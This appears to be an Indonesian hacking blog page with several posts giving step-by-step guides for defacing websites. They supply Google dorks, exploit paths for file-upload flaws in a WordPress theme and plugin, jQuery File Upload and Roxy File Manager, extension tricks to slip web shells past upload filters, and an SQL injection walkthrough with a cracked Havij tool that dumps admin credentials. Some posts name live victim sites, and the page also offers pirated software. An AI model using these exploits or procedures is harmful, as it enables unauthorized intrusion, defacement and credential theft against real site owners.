Codes Xploit: Web Hacking
Pages
Showing posts with label Web Hacking. Show all posts
Showing posts with label Web Hacking. Show all posts

Cara Deface Dengan Wp Themes Qualifire File Upload

 
ya akhir akhir ini jarang ngepost kwowkokw :'v karena gk ada bahan
akhirnya nemu juga buat jadiin bahan blog wowkowkowk langsung saja 

Dork : 
inurl:"/wp-content/themes/qualifire/ site:th 
inurl:"/wp-content/themes/qualifire/ 
*kembangkan oke

Exploitnya:"/wp-content/themes/qualifire/scripts/admin/uploadify/uploadify.php"
*tanpa tanda kutip ya gan :'v 
ciri ciri vuln ? blank page :'v 













karena ini butuh csrf w sediakan csrf onlinenya :) 
csrf online : Click here
oke selanjutnya adalah kita mengexploitasi target 
pertama kalian dorking dulu trus exploit :"v 
ok yang kedua adalah memasukkan target ke csrf nya 


nah isi seperti itu 
URL : url target dengan exploit 
contoh : http://target.com/wpcontent/themes/qualifire/scripts/admin/uploadify/uploadify.php
Post File : isi dengan Filedata

nah klo sudah kita pencet Kunci Target kamu upload shell atau sc
disini gue upload gambar :v 







kalau sudah tinggal pencet 'upload cok' 
kalau berhasil bakal muncul angka 1 seperti punya gue 








nah kalau seperti itu berarti berhasil ter upload 













tuh liat punya saya hehehehe 
akses shell nya ? http://site.com/namashell
masih kurang faham ? tenang ada vidionya kok ;) cekidot 

sekian terima kasih :* 

Cara Deface Jquery File Upload

 

assalamualaikum wr.wb
sore yang cerah untuk bikin post :'v ,kali ini gua bakal share POC
Jquery File Upload :'v
menurut gue ini cara deface yang paling mudah
tapi kita harus pande pande bypass ext shell nya :'v
ok kita lanjut ke tutorial

Bahan Bahan

-Shell ext :php.fla / php56 /php6 /php2 /php1 /.ndsfx / dll
-dork : Touch Me 
csrf onlen : Mpssh
exploit : http://target.com/[path]/server/php/
 itu aja :'v

Tutorial 

 yang pertama adalah kita dorking bisa lewat google image ato google biasa
klo dorking pake google image ya tinggal pencet images :'v di bawah kolom pencarian
contoh w dorking di google image :
Google Image















ciri ciri vuln ? seperti ini :'v Forbidden ? tinggalkan sadja :'v














ok lanjut ekse go to csrf nya :) trus isi url target
trus post filenya files [] contoh punya saya :
selanjut nya pencet lock target :'v abis itu upload shell klean trus pencet upload gan :'v


selanjutnya kita diredirect ke web tersebut lalu mendapatkan pesan sbb :

nah klo seperti itu berarti shell kita ter upload sekarang kita akses dengan menambahkan /files/namashell
contoh : www.kontok.com/server/php/files/w.php.fla











mudah kan ? masih kurang faham ? tenang ada vidionya kok

jangan lupa ya dilike fp nya :)

sekian terima kasih






 


Cara Deface Dengan SQLI (Havij)

 
kali ini gua mau share deface dengan sqli with Havij oke sebelumnya gua udah share tools havij ini
sekarang gua mau share cara makenya oke langsung aja

Bahan Bahan 

-Havij Crack nya (download disini gan)
-google dork : (download disini)
-Kesabaran :D

Tutorial 

kita Extrack Havij 1.16 dlu di tempat yang mudah dijangkau contoh Desktop
lalu klik kanan pada havij nya lalu Klik Run as admin












penampakan havij nya gini gan












oke selanjutnya kamu cari target dlu contoh saya ada live target
live : www.labooi.com/page.php?articles=17
exploit : site.com/contoh.php?id=69'
tambahin petik
oke Selanjutnya kita masukin ke havij nya tanpa tanda petik












lihat ss diatas, oke selanjut nya adalah kita klik analyze












kita tunggu ampe statusnya analyze ok selanjutnya adalah kita lihat tabel database nya
pencet tables












setelah itu klik get tables













ok selanjutnya adalah kita nyari column yang berhubungan dengan user admin pencet get columns
 contoh :
     user
     admin
     users
berhubung saya dapetnya web brazil so gue pilih table
engi_utillisateurs












terlihat banyak sangad datanya :'v selanjutnya kita centang apa saja yang digunakan untuk login lalu pencet get data
contoh
email , username , password ,id , dll *use your brain












tuh keliatan kan user dan pw admin
tapi klo masih bentuk md5 kita harus hash dlu
contoh di table password kek gini
fb889735bdeb0f8fc200aad392c6aafa745c9284
nah tinggal kita hash saja di hashkiller.co.uk
selanjutnya tinggal login deh
Add caption














tuh liat punya saya heheh masuk ke dashboard admin
btw klo mentok nyari admin loginnya make admin finder yang saya sudah share
upload shell ? use your brain :)
masih kurang paham ? nih vidionya

segitu aja dari gua :) jangan lupa like fp kami ya ^_^

Wordpress Plugins Mobile Detector Shell Upload

 


yo :'v dah lama gk ngepos ea ainx gk ada imajinasi buat share tutor :'v
nyari exploit baru di exploit-db nemu juga okwowkowk
langsung aja

Bahan : 

dork : inurl:"/wp-content/plugins/wp-mobile-detector/"
          *kembangkan
bekas defacean kalian
oke langsung ke TKP

TKP

1. Dorking di google :'v pilih satu gan jangan semua :'v
2.nah klo sudah exploit dengan
wp-content/plugins/wp-mobile-detector/resize.php
contoh:http://site.com/wp-content/plugins/wp-mobile-detector/resize.php
3.abis itu kita anuin resize.php nya
contoh :http://site.com/wp-content/plugins/wp-mobile-detector/resize.php?src=site.com/deface.php
*site.com/deface.php nya ganti sama bekas defacean kalian
4.nah klo udah akses deh ^_^
akses ? http://site.com/wp-content/plugins/wp-mobile-detector/cache/shell.php

Demo

http://www.alrashidschool.com/ischool/wp-content/plugins/wp-mobile-detector/cache/h3.html
Kurang Paham ? vidio nya

Cara Deface Roxy File Manager

 
yu wazzap gaes >:( kali ini gue mao share cara deface dengan Roxy File Manager
yaudah berhubung udah malem yaudah deh langsung aja >:(

dork: intitle:"Roxy File Manager"
         inurl:fileman/uploads/
*kembangkan
ext shell : .php56 .php.fla, .php.xxx , .php5 .php6, .php.xxxjpg , .php.orion , .php.h3ll dll
pertama klean dorking di google :) trus cari target klean
nah abis itu exploit dengan
site.com/path/fileman/index.html <- kurang lebih seperti itu :'v
Live Target ainx : http://canhogiaresaigon.com.vn/quanly/fileman/index.html












abis itu upload shell kalean
Foto saat upload shell














nah klo kek gitu bisa gan sekarang tinggal akses deh
akses ? site.com/path/filemanager/Uploads/shell.php.fla












heheheheheheheheeh mudah kan ? Tinggal tebas aja tuh kwowkowkokwowkokw
oh iya jan lupa Like fp kita ya hehehehehe

Download Havij 1.16 pro Portable Crack

 
yup :'v kali ini gua mau share tools andalan gua klo maen sqli yaitu Havij :'v
ya sedikit penjelesan tentang havij ini
havij adalah sebuah alat untuk melakukan penetrasi terhadap wesite yang mempunyai vulnerability di
Sql Injection :'v













ini tools karena namanya crack jadi otomatis udah full fiture :'v 
ok deh langsung aja ke link donlodnya :'v 

Download Gan

Lapor Klo link rusak ok ;)

Subscribe to Newsletter

Popular Posts

© Copyright 2017 Codes Xploit. Designed by Infinite Haxor. Distributed by Infinite Haxor.